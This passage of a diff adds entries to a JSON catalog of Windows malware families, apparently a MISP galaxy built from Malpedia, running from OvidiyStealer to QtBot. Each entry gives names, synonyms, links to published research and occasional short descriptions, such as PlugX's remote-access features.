{ + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", + "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" + ] + }, + "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", + "value": "OvidiyStealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "luckyowa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", + "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" + ] + }, + "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", + "value": "owaauth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", + "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", + "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" + ] + }, + "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", + "value": "PadCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", + "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + ] + }, + "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", + "value": "paladin", + "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." + }, + { + "meta": { + "synonyms": [ + "ZeusPanda" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", + "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", + "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", + "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", + "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", + "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", + "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", + "https://www.spamhaus.org/news/article/771/", + "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", + "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", + "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", + "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", + "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", + "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", + "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" + ] + }, + "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", + "value": "PandaBanker", + "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", + "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" + ] + }, + "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", + "value": "parasite_http", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" + ] + }, + "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", + "value": "Penco", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", + "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", + "value": "PetrWrap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", + "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", + "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" + ] + }, + "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", + "value": "Petya", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ReRol" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", + "https://community.fireeye.com/external/1093" + ] + }, + "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", + "value": "pgift", + "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", + "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", + "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", + "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", + "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", + "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" + ] + }, + "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", + "value": "Philadephia Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trik" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", + "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" + ] + }, + "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", + "value": "Phorpiex", + "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", + "https://www.snort.org/rule_docs/1-26941" + ] + }, + "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", + "value": "pipcreat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", + "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + ] + }, + "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", + "value": "pirpi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", + "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" + ] + }, + "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", + "value": "Pitou", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", + "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" + ] + }, + "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", + "value": "PittyTiger RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Pykbot", + "TBag", + "Bublik" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", + "http://blog.kleissner.org/?p=788", + "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", + "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" + ] + }, + "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", + "value": "Pkybot", + "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", + "value": "PLAINTEE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", + "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" + ] + }, + "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", + "value": "playwork", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TSCookie" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", + "http://www.freebuf.com/column/159865.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", + "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" + ] + }, + "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", + "value": "PLEAD", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" + ] + }, + "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", + "value": "Plexor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", + "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", + "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" + ] + }, + "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", + "value": "Ploutus ATM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", + "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" + ] + }, + "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", + "value": "ployx", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Korplug" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://community.rsa.com/thread/185439" + ] + }, + "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", + "value": "PlugX", + "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", + "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" + ] + }, + "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", + "value": "pngdowner", + "description": "" + }, + { + "meta": { + "synonyms": [ + "pivy", + "poisonivy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", + "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", + "value": "Poison Ivy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", + "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" + ] + }, + "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", + "value": "Polyglot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Siplog", + "Fareit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", + "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", + "https://github.com/nyx0/Pony" + ] + }, + "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", + "value": "Pony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", + "value": "PoohMilk Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", + "https://twitter.com/malwrhunterteam/status/806595092177965058" + ] + }, + "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", + "value": "Popcorn Time", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" + ] + }, + "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", + "value": "portless", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", + "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" + ] + }, + "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", + "value": "poscardstealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", + "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" + ] + }, + "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", + "value": "Poweliks Dropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", + "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + ] + }, + "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", + "value": "PowerDuke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", + "value": "PowerPool", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", + "https://lokalhost.pl/gozi_tree.txt" + ] + }, + "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", + "value": "Powersniff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", + "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ] + }, + "uuid": "606f778a-8b99-4880-8da8-b923651d627b", + "value": "PowerRatankba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", + "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" + ] + }, + "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", + "value": "prb_backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", + "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" + ] + }, + "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", + "value": "Prikorma", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/", + "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502" + ] + }, + "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", + "value": "Prilex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", + "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", + "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" + ] + }, + "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", + "value": "PrincessLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://twitter.com/mesa_matt/status/1035211747957923840" + ] + }, + "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", + "value": "PsiX", + "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule" + }, + { + "meta": { + "synonyms": [ + "PSS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", + "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" + ] + }, + "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", + "value": "PC Surveillance System", + "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + ] + }, + "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", + "value": "Pteranodon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", + "http://blog.alyac.co.kr/1853", + "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" + ] + }, + "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", + "value": "PubNubRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", + "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" + ] + }, + "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", + "value": "Punkey POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", + "https://github.com/n1nj4sec/pupy", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" + ] + }, + "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", + "value": "pupy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", + "https://www.secureworks.com/research/pushdo", + "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", + "http://malware-traffic-analysis.net/2017/04/03/index2.html", + "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" + ] + }, + "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", + "value": "Pushdo", + "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" + ] + }, + "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", + "value": "Putabmow", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", + "value": "PvzOut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", + "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", + "https://twitter.com/physicaldrive0/status/573109512145649664" + ] + }, + "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", + "value": "pwnpos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", + "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", + "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", + "https://www.youtube.com/watch?v=HfSQlC76_s4" + ] + }, + "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", + "value": "Pykspa", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Locky Locker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" + ] + }, + "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", + "value": "PyLocky", + "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" + ] + }, + "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", + "value": "Qaccel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", + "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", + "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", + "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", + "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", + "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", + "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf" + ] + }, + "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", + "value": "Qadars", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Qbot", + "Pinkslipbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", + "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", + "http://contagiodump.blogspot.com/2010/11/template.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" + ] + }, + "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", + "value": "QakBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Tolouge" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" + ] + }, + "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", + "value": "QHost", + "description": "" + }, + { + "meta": { + "synonyms": [ + "qtproject" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", + 